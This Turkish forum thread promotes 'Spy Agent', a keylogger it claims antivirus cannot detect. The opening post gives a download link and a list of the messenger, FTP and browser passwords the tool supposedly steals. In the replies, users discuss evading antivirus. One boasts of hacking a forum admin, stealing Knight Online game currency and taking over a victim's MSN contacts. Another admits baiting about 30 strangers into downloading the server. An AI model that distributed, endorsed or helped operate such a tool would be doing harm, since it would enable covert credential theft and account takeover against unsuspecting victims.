SPY AGENT Antilere kesinlikle yakalanmıyor...!

fleety

Banned
Reaction score
0
Spy Agent Antilere kesinlikle yakalanmayan bi keyloggerdır.
DOWNLOAD:http://rapidshare.com/files/22541132/S_P_A_G_E_N_T_.rar
viewer.php

532558spy_agent.bmp

Alınabilen Şifreler:
ICQ 99/2003/Lite
MSN Messenger 6.x / 7.x Şifreleri
Windows Messenger Şifreleri
Yahoo Messenger 5.x / 6.x Şifreleri
Miranda-IM Şifreleri
Trillian Şifreleri
&RQ Şifreleri
The Bat! Şifreleri
AOL IM Şifreleri
Windows & Total Commander Şifreleri
GAIM Şifreleri
Becky Şifreleri
Cute FTP Şifreleri
E-Dialer Şifreleri
FAR Manager Şifreleri
WS_FTP Şifreleri
Diğer Ftp Şifreleri
IE Şifreleri
RAS (Dial-up) Şifreleri
Hafızadaki Şifreler
NOT:Lütfen bir teşekkürü çok görmeyin...

ya aga link nerdeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
link pls

çok saollllllllllllllllll

ya aga bişi sorcam
bu knight şifrelerini de werir demi¿¿¿

sorunsuz diyorsun ama daha verdigin link sorunlu

rapidden indirdik, ama maalesef acilmiyor anladin

:(:(:( Arkadaslar Yardim Edİn Orda Downloader Server Yazio YanliŞlikla Onu AÇtim Şİmdİ Habİre BİŞİler İndİrİo Nasil DÜzeltİrİm LÜtfen Yardim Edİn Allah Rizasi İÇİn ÜzÜntÜden NapcaĞimi Bİlmiom Kota Fazla Gelirsen Hem Dayak Yİyem Hemde İnternet Gİtcek LÜtfen Arkadaslar

crazyy44' Alıntı:
rapidden indirdik, ama maalesef acilmiyor anladin

sen serverı zipleyemesin kaza eseri kardeş antilerede yakalnmıyo diyosun?

+ tpt nin resmi sitesinde bu program yok ? --------------- kardeş kusura bakma ama ben kıllandım bilgin olsun acabilen yok programı.

kadirimben' Alıntı:
:(:(:( Arkadaslar Yardim Edİn Orda Downloader Server Yazio YanliŞlikla Onu AÇtim Şİmdİ Habİre BİŞİler İndİrİo Nasil DÜzeltİrİm LÜtfen Yardim Edİn Allah Rizasi İÇİn ÜzÜntÜden NapcaĞimi Bİlmiom Kota Fazla Gelirsen Hem Dayak Yİyem Hemde İnternet Gİtcek LÜtfen Arkadaslar

arkadaslar biriniz bakın ya Gercekten cok zor durumdayım

DeNSiZ' Alıntı:
sen serverı zipleyemesin kaza eseri kardeş antilerede yakalnmıyo diyosun?

+ tpt nin resmi sitesinde bu program yok ? ----------------- kardeş kusura bakma ama ben kıllandım bilgin olsun acabilen yok programı.
www.turtle.kayyo.com da başka bir nickle yayınladım arkadaşım...!

kadirimben' Alıntı:
arkadaslar biriniz bakın ya Gercekten cok zor durumdayım
Başlat/Çalıştır gir msconfig yaz başlangıç bölümünde ki her şeyi kaldır pc i yeniden başlat veya biraz bekle çünkü şu an bu programı KasperSky dahil hiç bir anti kesinlikle yakalayamıyor dediğimi dene birde ctrl+alt+delete'den bilmediğin bütün exeleri sonlandır...!
Bu arada arkadaşım indirmişsin etmişsin hatta download serverini bile çalıştırmışsın bir teşekkürü çok görme yahu....

@fllety
usta program çalısıyor,eline sağlık.

fakat ......

-program şifre mifre bulmuyor,yollamıyor.

-"Victim-Bilgi" altında ancak "Bilgisayar Adı","Klavye girdileri" ve "çalısan Programlar" hakkında bilgi veriyor.

-kurbanin ip'sini yollamıyor

-Kasperskye yakalanıyor

niye şifre bulup yollamıyor?
ilk sayfadaki sıraladığın şifrelerin hiçbirini bulup yollamıyor.
sırf keylogger.

usta paylasimturkey.com un adminini hackledim,forumm.net e koydum yakalayamadılar soruyorum sana daha var mı otesi bu arada Knight Online oynuyorsan bilgilendireyim ilk hacklediğim adamdan 3milyarlık para kaldırdım (sefam olsun) .Usta birini daha hackledim herifin MSN'inde 550 kişi var ondaki kızları bana geçirdim:D:D

vay be yazıklar olsun.....
resmen hırsızlık icin kullanıyorsun yani?
birde cok iyi birşey yapmış gibi burda hava atıyosun.

ben tek denemek icin kullanıyorum,ileride bu bilgilerle hem kendimi nasıl korurum ve diyer vatandaslarada bilgilendirip faydalı olmaya calışıyorum.(server'leri tek yabancılarda deniyorum)

her neyse,program şifre mifre yollamıyor yine tekrarlıyorum.
ip numarası bile yok,yani söze gerek yok.

hakledigin kişilerin şifrelerini klavye tuşlarını takip ederekmi elde ettin yoksa şifreler geliyormu sana?
bana şifre mifre gelmiyorda ondan.

Ziyaretci9' Alıntı:
vay be yazıklar olsun.....
resmen hırsızlık icin kullanıyorsun yani?
birde cok iyi birşey yapmış gibi burda hava atıyosun.

ben tek denemek icin kullanıyorum,ileride bu bilgilerle hem kendimi nasıl korurum ve diyer vatandaslarada bilgilendirip faydalı olmaya calışıyorum.(server'leri tek yabancılarda deniyorum)

her neyse,program şifre mifre yollamıyor yine tekrarlıyorum.
ip numarası bile yok,yani söze gerek yok.

hakledigin kişilerin şifrelerini klavye tuşlarını takip ederekmi elde ettin yoksa şifreler geliyormu sana?
bana şifre mifre gelmiyorda ondan.

oyun parasıyla 3milyar, gerçke parayla bir alakası yok yani celallenme hemen.. gerçi pek

tasvip etmem bu knight soygunlarını ben, sonuçta çok acı bir emek hırsızlığı, neyse..

ayrıca şifre gelmez, dediğin gibi, klavye tuşlarını takip etmen gerekli.. açılan sayfalar,

girilen yerler vs önemli kısaca..

gelen maillerde kurbanın yazışmaları karman çorman görünüyo nedendir acep?

TuRK_HaRD' Alıntı:
oyun parasıyla 3milyar, gerçke parayla bir alakası yok yani celallenme hemen.. gerçi pek

tasvip etmem bu knight soygunlarını ben, sonuçta çok acı bir emek hırsızlığı, neyse..

ayrıca şifre gelmez, dediğin gibi, klavye tuşlarını takip etmen gerekli.. açılan sayfalar,

girilen yerler vs önemli kısaca..

ok anladım.
fleety sen ozaman niye bütün messenger şifrelerini bulup yolluyor diye ekledin ilk mesaja?
TuRK_HaRD peki senin bir diyer konudaki " TpTspy Cracked ..." program şifre mifre yolluyormu?

neyse birde onu deniyelim.
server kasperskye yakalanmıyor onu biliyorum :goz:

bu konudaki programin serverini bugün bir siteye ekledim "alin size şöyle böyle program misali..." 2 saat icinde yaklaşik 30 kişi indirdi,baktim durmuyor hemen sildim linki:saskin .

cünkü amacim tek arastirmak,deney....enteresan,zarar vermek deyil.

bunlardan ağa yakalanan tek 7-8 kişi.

Tycon' Alıntı:
gelen maillerde kurbanın yazışmaları karman çorman görünüyo nedendir acep?

evet usta haklisin,çok karışık.
sendemi googlemail kullanıyorsun?

yinede programa emek verenlere teşekkür ederim, çok eksiği olsada iyi çalışıyor.

Hocam Iyi Gusel Yakanmiyo Diyosunda Dogru Server Durdugu Yerde Yakalanmiyo Fakat Kurban Tikladiktan Sorna Server Yakalanmaya Basliyo Yani Arkadasla Anlicaniz Karsi Tafa Gonderdiginizde Adamin Anti Tanimicak Ama Kurban Tikladiktan Sorna Ne Olcak Sonucta Yine Yakalncak Bu. Sadece Cuvali Taninmiyor Icindekiler Taniniyor Anlicaginiz Ise Yaramaz Bizzat Kendi Pc De Est Ettim Tikladiktan Sonra Avast Bile Bulup Silio

paradoxin' Alıntı:
Hocam Iyi Gusel Yakanmiyo Diyosunda Dogru Server Durdugu Yerde Yakalanmiyo Fakat Kurban Tikladiktan Sorna Server Yakalanmaya Basliyo Yani Arkadasla Anlicaniz Karsi Tafa Gonderdiginizde Adamin Anti Tanimicak Ama Kurban Tikladiktan Sorna Ne Olcak Sonucta Yine Yakalncak Bu. Sadece Cuvali Taninmiyor Icindekiler Taniniyor Anlicaginiz Ise Yaramaz Bizzat Kendi Pc De Est Ettim Tikladiktan Sonra Avast Bile Bulup Silio
Demek ki benim kullanmaya bile tenezzül etmediğim ,dandik diye yüzüne bakmadığım Avast KasperSky Internet Security Son Versiyonu'ndan daha iyi.Ben kullanıyorum defalarca test ettim bu arada söz söylememe gerek yok yaa ben koydum Virüs tarama sonucunu...!

Geri